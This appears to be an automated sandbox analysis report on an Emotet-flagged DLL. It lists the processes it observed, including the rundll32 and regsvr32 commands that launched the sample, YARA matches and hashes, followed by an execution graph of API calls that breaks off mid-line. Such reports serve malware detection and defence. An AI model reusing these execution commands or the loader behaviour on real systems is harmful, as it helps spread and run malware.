                                                                                                                                              Imagebase:0x7ff73c2a0000
                                                                                                                                              File size:69632 bytes
                                                                                                                                              MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.278869387.0000026ED90D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.278417098.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              Reputation:high

                                                                                                                                              Target ID:5
                                                                                                                                              Start time:05:17:20
                                                                                                                                              Start date:14/05/2022
                                                                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:rundll32.exe C:\Users\user\Desktop\auExrOTnvB.dll,DllUnregisterServer
                                                                                                                                              Imagebase:0x7ff73c2a0000
                                                                                                                                              File size:69632 bytes
                                                                                                                                              MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              Target ID:6
                                                                                                                                              Start time:05:17:20
                                                                                                                                              Start date:14/05/2022
                                                                                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ScjWhFiaOACVkfkp\NbnBEvmCoIR.dll"
                                                                                                                                              Imagebase:0x7ff6ae680000
                                                                                                                                              File size:24064 bytes
                                                                                                                                              MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.663304380.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.663485970.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              Reputation:high

                                                                                                                                              Target ID:9
                                                                                                                                              Start time:05:17:26
                                                                                                                                              Start date:14/05/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              Target ID:10
                                                                                                                                              Start time:05:17:27
                                                                                                                                              Start date:14/05/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              Target ID:11
                                                                                                                                              Start time:05:17:28
                                                                                                                                              Start date:14/05/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              Target ID:12
                                                                                                                                              Start time:05:17:30
                                                                                                                                              Start date:14/05/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              Target ID:13
                                                                                                                                              Start time:05:17:35
                                                                                                                                              Start date:14/05/2022
                                                                                                                                              Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                              Imagebase:0x7ff6805c0000
                                                                                                                                              File size:163336 bytes
                                                                                                                                              MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              Target ID:14
                                                                                                                                              Start time:05:17:35
                                                                                                                                              Start date:14/05/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              Target ID:16
                                                                                                                                              Start time:05:17:41
                                                                                                                                              Start date:14/05/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              Target ID:17
                                                                                                                                              Start time:05:17:46
                                                                                                                                              Start date:14/05/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              Target ID:19
                                                                                                                                              Start time:05:18:22
                                                                                                                                              Start date:14/05/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              Target ID:23
                                                                                                                                              Start time:05:18:25
                                                                                                                                              Start date:14/05/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              Target ID:26
                                                                                                                                              Start time:05:18:36
                                                                                                                                              Start date:14/05/2022
                                                                                                                                              Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                              Imagebase:0x7ff7b0320000
                                                                                                                                              File size:455656 bytes
                                                                                                                                              MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              Target ID:27
                                                                                                                                              Start time:05:18:36
                                                                                                                                              Start date:14/05/2022
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff7c9170000
                                                                                                                                              File size:625664 bytes
                                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              Target ID:28
                                                                                                                                              Start time:05:18:53
                                                                                                                                              Start date:14/05/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              Target ID:30
                                                                                                                                              Start time:05:19:14
                                                                                                                                              Start date:14/05/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              Reset < >

                                                                                                                                                Execution Graph

                                                                                                                                                Execution Coverage:10.7%
                                                                                                                                                Dynamic/Decrypted Code Coverage:2.5%
                                                                                                                                                Signature Coverage:16.1%
                                                                                                                                                Total number of Nodes:684
                                                                                                                                                Total number of Limit Nodes:6
                                                                                                                                                execution_graph 9724 b00000 9725 b00183 9724->9725 9726 b0043e VirtualAlloc 9725->9726 9730 b00462 9726->9730 9727 b00a7b 9728 b00531 GetNativeSystemInfo 9728->9727 9729 b0056d VirtualAlloc 9728->9729 9734 b0058b 9729->9734 9730->9727 9730->9728 9731 b00a00 9731->9727 9732 b00a56 RtlAddFunctionTable 9731->9732 9732->9727 9733 b009d9 VirtualProtect 9733->9734 9734->9731 9734->9733 9720 7ffc67201ee7 9721 7ffc67201f13 RtlAllocateHeap 9720->9721 9722 7ffc67201f3d RtlDeleteBoundaryDescriptor 9721->9722 9723 7ffc67201f5c 9721->9723 9722->9723 9735 180021c3c 9736 180021c97 9735->9736 9739 180001bdc 9736->9739 9738 180021e38 9741 180001c82 9739->9741 9740 180001d21 CreateProcessW 9740->9738 9741->9740 9742 7ffc67202290 9744 7ffc672022b6 9742->9744 9743 7ffc672022f3 9751 7ffc672022be 9743->9751 9796 7ffc671c1230 9743->9796 9744->9743 9744->9751 9754 7ffc67202154 9744->9754 9748 7ffc67202335 9749 7ffc67202154 126 API calls 9748->9749 9748->9751 9749->9751 9750 7ffc671c1230 8 API calls 9752 7ffc67202328 9750->9752 9753 7ffc67202154 126 API calls 9752->9753 9753->9748 9755 7ffc67202162 9754->9755 9756 7ffc672021e1 9754->9756 9801 7ffc67204110 HeapCreate 9755->9801 9758 7ffc6720221e 9756->9758 9764 7ffc672021e5 9756->9764 9759 7ffc67202279 9758->9759 9760 7ffc67202223 9758->9760 9781 7ffc6720216d 9759->9781 9921 7ffc67202f50 9759->9921 9894 7ffc67203108 9760->9894 9765 7ffc67203a48 46 API calls 9764->9765 9764->9781 9768 7ffc67202212 9765->9768 9767 7ffc67202179 _RTC_Initialize 9774 7ffc67202189 GetCommandLineA 9767->9774 9789 7ffc6720217d 9767->9789 9771 7ffc67202c94 48 API calls 9768->9771 9773 7ffc67202217 9771->9773 9772 7ffc67202243 FlsSetValue 9775 7ffc67202259 9772->9775 9776 7ffc6720226f 9772->9776 9905 7ffc6720415c HeapDestroy 9773->9905 9820 7ffc67203eec 9774->9820 9906 7ffc67202cbc 9775->9906 9915 7ffc67203024 9776->9915 9781->9743 9786 7ffc672021ab 9858 7ffc67202c94 9786->9858 9899 7ffc6720415c HeapDestroy 9789->9899 9790 7ffc672021b7 9791 7ffc672021cb 9790->9791 9873 7ffc67203aec 9790->9873 9791->9781 9900 7ffc67203a48 9791->9900 9797 7ffc671c1249 wcsftime 9796->9797 9798 7ffc671c1276 9797->9798 9799 7ffc672020e0 __initmbctable 8 API calls 9798->9799 9800 7ffc6720203e 9799->9800 9800->9748 9800->9750 9802 7ffc67202169 9801->9802 9803 7ffc67204134 HeapSetInformation 9801->9803 9802->9781 9804 7ffc67202fa0 9802->9804 9803->9802 9927 7ffc672036f0 9804->9927 9806 7ffc67202fab 9932 7ffc67206970 9806->9932 9809 7ffc67203014 9811 7ffc67202c94 48 API calls 9809->9811 9810 7ffc67202fb4 FlsAlloc 9810->9809 9812 7ffc67202fcc 9810->9812 9813 7ffc67203019 9811->9813 9814 7ffc67203108 __wtomb_environ 45 API calls 9812->9814 9813->9767 9815 7ffc67202fdb 9814->9815 9815->9809 9816 7ffc67202fe3 FlsSetValue 9815->9816 9816->9809 9817 7ffc67202ff6 9816->9817 9818 7ffc67202cbc _set_errno 45 API calls 9817->9818 9819 7ffc67203000 GetCurrentThreadId 9818->9819 9819->9813 9821 7ffc67203f1b GetEnvironmentStringsW 9820->9821 9822 7ffc67203f4d 9820->9822 9823 7ffc67203f35 GetLastError 9821->9823 9824 7ffc67203f29 9821->9824 9822->9824 9825 7ffc67204010 9822->9825 9823->9822 9827 7ffc67203f5b GetEnvironmentStringsW 9824->9827 9828 7ffc67203f70 WideCharToMultiByte 9824->9828 9826 7ffc6720401d GetEnvironmentStrings 9825->9826 9829 7ffc6720219b 9825->9829 9826->9829 9830 7ffc6720402f 9826->9830 9827->9828 9827->9829 9832 7ffc67203fff 9828->9832 9833 7ffc67203fbe 9828->9833 9845 7ffc67203758 GetStartupInfoA 9829->9845 9835 7ffc6720309c __setargv 45 API calls 9830->9835 9834 7ffc67204002 FreeEnvironmentStringsW 9832->9834 9939 7ffc6720309c 9833->9939 9834->9829 9837 7ffc67204053 9835->9837 9839 7ffc6720405b FreeEnvironmentStringsA 9837->9839 9840 7ffc67204069 __initmbctable 9837->9840 9839->9829 9843 7ffc67204077 FreeEnvironmentStringsA 9840->9843 9841 7ffc67203fce WideCharToMultiByte 9841->9834 9842 7ffc67203ff7 9841->9842 9844 7ffc67203024 free 45 API calls 9842->9844 9843->9829 9844->9832 9846 7ffc67203108 __wtomb_environ 45 API calls 9845->9846 9856 7ffc67203795 9846->9856 9847 7ffc672021a7 9847->9786 9866 7ffc67203df4 9847->9866 9848 7ffc67203981 GetStdHandle 9852 7ffc6720395b 9848->9852 9849 7ffc67203108 __wtomb_environ 45 API calls 9849->9856 9850 7ffc672039b0 GetFileType 9850->9852 9851 7ffc67203a10 SetHandleCount 9851->9847 9852->9847 9852->9848 9852->9850 9852->9851 9855 7ffc67207ee4 _lock InitializeCriticalSectionAndSpinCount 9852->9855 9853 7ffc672038f7 GetFileType 9854 7ffc672038c4 9853->9854 9854->9847 9854->9852 9854->9853 9857 7ffc67207ee4 _lock InitializeCriticalSectionAndSpinCount 9854->9857 9855->9852 9856->9847 9856->9849 9856->9852 9856->9854 9857->9854 9859 7ffc67202ca3 FlsFree 9858->9859 9860 7ffc67202cb0 9858->9860 9859->9860 9861 7ffc67206a4d 9860->9861 9862 7ffc67206a2f DeleteCriticalSection 9860->9862 9864 7ffc67206a5b DeleteCriticalSection 9861->9864 9865 7ffc67206a6a 9861->9865 9863 7ffc67203024 free 45 API calls 9862->9863 9863->9860 9864->9861 9865->9789 9867 7ffc67203e11 GetModuleFileNameA 9866->9867 9868 7ffc67203e0c 9866->9868 9870 7ffc67203e43 __setargv 9867->9870 10085 7ffc67204ecc 9868->10085 9871 7ffc6720309c __setargv 45 API calls 9870->9871 9872 7ffc67203e97 __setargv 9870->9872 9871->9872 9872->9790 9874 7ffc67203b09 9873->9874 9877 7ffc67203b0e __wtomb_environ 9873->9877 9875 7ffc67204ecc __initmbctable 83 API calls 9874->9875 9875->9877 9876 7ffc672021c0 9876->9791 9888 7ffc6720347c 9876->9888 9877->9876 9878 7ffc67203108 __wtomb_environ 45 API calls 9877->9878 9885 7ffc67203b4d __wtomb_environ 9878->9885 9879 7ffc67203bc6 9880 7ffc67203024 free 45 API calls 9879->9880 9880->9876 9881 7ffc67203108 __wtomb_environ 45 API calls 9881->9885 9882 7ffc67203c02 9884 7ffc67203024 free 45 API calls 9882->9884 9883 7ffc67207fbc __wtomb_environ 45 API calls 9883->9885 9884->9876 9885->9876 9885->9879 9885->9881 9885->9882 9885->9883 9886 7ffc67203ba2 9885->9886 9887 7ffc67206550 __wtomb_environ 6 API calls 9886->9887 9887->9885 9889 7ffc67203492 _cinit 9888->9889 10489 7ffc672073f4 9889->10489 9891 7ffc672034af _initterm_e 9893 7ffc672034d2 _cinit 9891->9893 10492 7ffc672073dc 9891->10492 9893->9791 9895 7ffc6720312d 9894->9895 9897 7ffc67202237 9895->9897 9898 7ffc6720314b Sleep 9895->9898 10509 7ffc67206cec 9895->10509 9897->9772 9897->9781 9898->9895 9898->9897 9899->9781 9904 7ffc67203a59 9900->9904 9901 7ffc67203aa8 9901->9786 9902 7ffc67203a70 DeleteCriticalSection 9902->9904 9903 7ffc67203024 free 45 API calls 9903->9904 9904->9901 9904->9902 9904->9903 9905->9781 9907 7ffc67206ba0 _lock 45 API calls 9906->9907 9908 7ffc67202d11 9907->9908 10518 7ffc67206a80 LeaveCriticalSection 9908->10518 9916 7ffc67203029 HeapFree 9915->9916 9917 7ffc67203059 realloc 9915->9917 9916->9917 9918 7ffc67203044 9916->9918 9917->9781 9919 7ffc672067e0 _errno 43 API calls 9918->9919 9920 7ffc67203049 GetLastError 9919->9920 9920->9917 9922 7ffc67202f88 9921->9922 9923 7ffc67202f64 9921->9923 9922->9781 9924 7ffc67202f69 FlsGetValue 9923->9924 9925 7ffc67202f78 FlsSetValue 9923->9925 9924->9925 10519 7ffc67202e18 9925->10519 9936 7ffc67202c5c EncodePointer 9927->9936 9929 7ffc672036fb _initp_misc_winsig 9930 7ffc6720755c EncodePointer 9929->9930 9931 7ffc6720373e EncodePointer 9930->9931 9931->9806 9935 7ffc67206993 9932->9935 9934 7ffc67202fb0 9934->9809 9934->9810 9935->9934 9937 7ffc67207ee4 InitializeCriticalSectionAndSpinCount 9935->9937 9938 7ffc67207f11 9937->9938 9938->9935 9940 7ffc672030b8 9939->9940 9942 7ffc672030f0 9940->9942 9943 7ffc672030d0 Sleep 9940->9943 9944 7ffc67206c34 9940->9944 9942->9832 9942->9841 9943->9940 9943->9942 9945 7ffc67206cc8 realloc 9944->9945 9954 7ffc67206c4c realloc 9944->9954 9948 7ffc672067e0 _errno 44 API calls 9945->9948 9946 7ffc67206c84 RtlAllocateHeap 9949 7ffc67206cbd 9946->9949 9946->9954 9948->9949 9949->9940 9950 7ffc67206cad 10003 7ffc672067e0 9950->10003 9953 7ffc67206cb2 9956 7ffc672067e0 _errno 44 API calls 9953->9956 9954->9946 9954->9950 9954->9953 9957 7ffc67206c64 9954->9957 9956->9949 9957->9946 9958 7ffc67207160 9957->9958 9967 7ffc67206f0c 9957->9967 10000 7ffc6720334c 9957->10000 10006 7ffc6720d2ac 9958->10006 9961 7ffc6720717d 9963 7ffc67206f0c _FF_MSGBANNER 45 API calls 9961->9963 9965 7ffc6720719e 9961->9965 9962 7ffc6720d2ac _FF_MSGBANNER 45 API calls 9962->9961 9964 7ffc67207194 9963->9964 9966 7ffc67206f0c _FF_MSGBANNER 45 API calls 9964->9966 9965->9957 9966->9965 9968 7ffc67206f2f 9967->9968 9969 7ffc6720d2ac _FF_MSGBANNER 42 API calls 9968->9969 9999 7ffc672070d4 9968->9999 9970 7ffc67206f51 9969->9970 9971 7ffc672070d6 GetStdHandle 9970->9971 9973 7ffc6720d2ac _FF_MSGBANNER 42 API calls 9970->9973 9972 7ffc672070e9 __wtomb_environ 9971->9972 9971->9999 9976 7ffc672070ff WriteFile 9972->9976 9972->9999 9974 7ffc67206f64 9973->9974 9974->9971 9975 7ffc67206f75 9974->9975 9975->9999 10025 7ffc67207fbc 9975->10025 9976->9999 9979 7ffc67206fb9 GetModuleFileNameA 9981 7ffc6720700a __wtomb_environ 9979->9981 9982 7ffc67206fd9 9979->9982 9980 7ffc67206550 __wtomb_environ 6 API calls 9980->9979 9985 7ffc67207065 9981->9985 10034 7ffc6720bf14 9981->10034 9983 7ffc67207fbc __wtomb_environ 42 API calls 9982->9983 9984 7ffc67206ff1 9983->9984 9984->9981 9987 7ffc67206550 __wtomb_environ 6 API calls 9984->9987 10043 7ffc6720bdf4 9985->10043 9987->9981 9990 7ffc67207090 9993 7ffc6720bdf4 _FF_MSGBANNER 42 API calls 9990->9993 9992 7ffc67206550 __wtomb_environ 6 API calls 9992->9990 9994 7ffc672070a6 9993->9994 9996 7ffc672070bf 9994->9996 9998 7ffc67206550 __wtomb_environ 6 API calls 9994->9998 9995 7ffc67206550 __wtomb_environ 6 API calls 9995->9985 10052 7ffc6720d0b8 9996->10052 9998->9996 9999->9957 10070 7ffc67203310 GetModuleHandleW 10000->10070 10073 7ffc67202d70 GetLastError FlsGetValue 10003->10073 10005 7ffc672067e9 10005->9953 10007 7ffc6720d2b4 10006->10007 10008 7ffc6720716e 10007->10008 10009 7ffc672067e0 _errno 45 API calls 10007->10009 10008->9961 10008->9962 10010 7ffc6720d2d9 10009->10010 10012 7ffc672066d8 DecodePointer 10010->10012 10013 7ffc67206709 10012->10013 10014 7ffc67206723 _invalid_parameter_noinfo 10012->10014 10013->10008 10016 7ffc67206550 10014->10016 10023 7ffc672087a0 10016->10023 10019 7ffc672065ad 10020 7ffc6720660d IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10019->10020 10021 7ffc67206658 GetCurrentProcess TerminateProcess 10020->10021 10022 7ffc6720664c _invalid_parameter_noinfo 10020->10022 10021->10013 10022->10021 10024 7ffc67206570 RtlCaptureContext 10023->10024 10024->10019 10026 7ffc67207fd1 10025->10026 10027 7ffc67207fc7 10025->10027 10028 7ffc672067e0 _errno 45 API calls 10026->10028 10027->10026 10032 7ffc67207ffd 10027->10032 10029 7ffc67207fd9 10028->10029 10030 7ffc672066d8 _invalid_parameter_noinfo 7 API calls 10029->10030 10031 7ffc67206fa0 10030->10031 10031->9979 10031->9980 10032->10031 10033 7ffc672067e0 _errno 45 API calls 10032->10033 10033->10029 10038 7ffc6720bf22 10034->10038 10035 7ffc6720bf27 10036 7ffc672067e0 _errno 45 API calls 10035->10036 10037 7ffc6720704c 10035->10037 10042 7ffc6720bf51 10036->10042 10037->9985 10037->9995 10038->10035 10038->10037 10040 7ffc6720bf75 10038->10040 10039 7ffc672066d8 _invalid_parameter_noinfo 7 API calls 10039->10037 10040->10037 10041 7ffc672067e0 _errno 45 API calls 10040->10041 10041->10042 10042->10039 10044 7ffc6720be0c 10043->10044 10047 7ffc6720be02 10043->10047 10045 7ffc672067e0 _errno 45 API calls 10044->10045 10046 7ffc6720be14 10045->10046 10048 7ffc672066d8 _invalid_parameter_noinfo 7 API calls 10046->10048 10047->10044 10049 7ffc6720be50 10047->10049 10050 7ffc67207077 10048->10050 10049->10050 10051 7ffc672067e0 _errno 45 API calls 10049->10051 10050->9990 10050->9992 10051->10046 10069 7ffc67202c5c EncodePointer 10052->10069 10071 7ffc6720332a GetProcAddress 10070->10071 10072 7ffc6720333f ExitProcess 10070->10072 10071->10072 10074 7ffc67202d96 10073->10074 10075 7ffc67202dde SetLastError 10073->10075 10076 7ffc67203108 __wtomb_environ 40 API calls 10074->10076 10075->10005 10077 7ffc67202da3 10076->10077 10077->10075 10078 7ffc67202dab FlsSetValue 10077->10078 10079 7ffc67202dd7 10078->10079 10080 7ffc67202dc1 10078->10080 10082 7ffc67203024 free 40 API calls 10079->10082 10081 7ffc67202cbc _set_errno 40 API calls 10080->10081 10083 7ffc67202dc8 GetCurrentThreadId 10081->10083 10084 7ffc67202ddc 10082->10084 10083->10075 10084->10075 10086 7ffc67204ed9 10085->10086 10087 7ffc67204ee3 10085->10087 10089 7ffc67204cd4 10086->10089 10087->9867 10113 7ffc67202df4 10089->10113 10096 7ffc67204e81 10096->10087 10097 7ffc6720309c __setargv 45 API calls 10098 7ffc67204d24 __initmbctable 10097->10098 10098->10096 10136 7ffc67204a0c 10098->10136 10101 7ffc67204e83 10101->10096 10103 7ffc67204e9c 10101->10103 10104 7ffc67203024 free 45 API calls 10101->10104 10102 7ffc67204d5f 10106 7ffc67203024 free 45 API calls 10102->10106 10107 7ffc67204d84 10102->10107 10105 7ffc672067e0 _errno 45 API calls 10103->10105 10104->10103 10105->10096 10106->10107 10107->10096 10146 7ffc67206ba0 10107->10146 10114 7ffc67202d70 _set_errno 45 API calls 10113->10114 10115 7ffc67202dff 10114->10115 10116 7ffc67202e0f 10115->10116 10152 7ffc672032e0 10115->10152 10118 7ffc672048c0 10116->10118 10119 7ffc67202df4 _getptd 45 API calls 10118->10119 10120 7ffc672048cf 10119->10120 10121 7ffc672048ea 10120->10121 10122 7ffc67206ba0 _lock 45 API calls 10120->10122 10123 7ffc6720496e 10121->10123 10126 7ffc672032e0 _getptd 45 API calls 10121->10126 10127 7ffc672048fd 10122->10127 10129 7ffc6720497c 10123->10129 10124 7ffc67204934 10157 7ffc67206a80 LeaveCriticalSection 10124->10157 10126->10123 10127->10124 10128 7ffc67203024 free 45 API calls 10127->10128 10128->10124 10158 7ffc67202534 10129->10158 10132 7ffc672049c1 10134 7ffc672049ac 10132->10134 10135 7ffc672049c6 GetACP 10132->10135 10133 7ffc6720499c GetOEMCP 10133->10134 10134->10096 10134->10097 10135->10134 10137 7ffc6720497c __initmbctable 47 API calls 10136->10137 10138 7ffc67204a33 10137->10138 10139 7ffc67204a3b __initmbctable 10138->10139 10140 7ffc67204a8c IsValidCodePage 10138->10140 10145 7ffc67204ab2 unexpected 10138->10145 10335 7ffc672020e0 10139->10335 10140->10139 10142 7ffc67204a9d GetCPInfo 10140->10142 10142->10139 10142->10145 10143 7ffc67204c6f 10143->10101 10143->10102 10325 7ffc672046dc GetCPInfo 10145->10325 10147 7ffc67206bcf EnterCriticalSection 10146->10147 10148 7ffc67206bbe 10146->10148 10463 7ffc67206ab8 10148->10463 10151 7ffc672032e0 _getptd 44 API calls 10151->10147 10153 7ffc67207160 _FF_MSGBANNER 44 API calls 10152->10153 10154 7ffc672032ed 10153->10154 10155 7ffc67206f0c _FF_MSGBANNER 44 API calls 10154->10155 10156 7ffc672032f4 DecodePointer 10155->10156 10159 7ffc6720254a 10158->10159 10165 7ffc672025ae 10158->10165 10160 7ffc67202df4 _getptd 45 API calls 10159->10160 10161 7ffc6720254f 10160->10161 10162 7ffc67202587 10161->10162 10166 7ffc6720524c 10161->10166 10164 7ffc672048c0 __initmbctable 45 API calls 10162->10164 10162->10165 10164->10165 10165->10132 10165->10133 10167 7ffc67202df4 _getptd 45 API calls 10166->10167 10168 7ffc67205257 10167->10168 10169 7ffc67205280 10168->10169 10170 7ffc67205272 10168->10170 10171 7ffc67206ba0 _lock 45 API calls 10169->10171 10172 7ffc67202df4 _getptd 45 API calls 10170->10172 10173 7ffc6720528a 10171->10173 10174 7ffc67205277 10172->10174 10180 7ffc672051f4 10173->10180 10178 7ffc672052b8 10174->10178 10179 7ffc672032e0 _getptd 45 API calls 10174->10179 10178->10162 10179->10178 10181 7ffc6720523e 10180->10181 10182 7ffc67205202 _set_errno ___lc_collate_cp_func 10180->10182 10184 7ffc67206a80 LeaveCriticalSection 10181->10184 10182->10181 10185 7ffc67204f04 10182->10185 10187 7ffc67204f9b 10185->10187 10189 7ffc67204f22 10185->10189 10186 7ffc67204fee 10205 7ffc6720501b 10186->10205 10237 7ffc672098a4 10186->10237 10187->10186 10188 7ffc67203024 free 45 API calls 10187->10188 10191 7ffc67204fbf 10188->10191 10189->10187 10190 7ffc67204f61 10189->10190 10196 7ffc67203024 free 45 API calls 10189->10196 10194 7ffc67204f83 10190->10194 10204 7ffc67203024 free 45 API calls 10190->10204 10193 7ffc67203024 free 45 API calls 10191->10193 10197 7ffc67204fd3 10193->10197 10199 7ffc67203024 free 45 API calls 10194->10199 10201 7ffc67204f55 10196->10201 10203 7ffc67203024 free 45 API calls 10197->10203 10198 7ffc67205067 10206 7ffc67204f8f 10199->10206 10200 7ffc67203024 free 45 API calls 10200->10205 10213 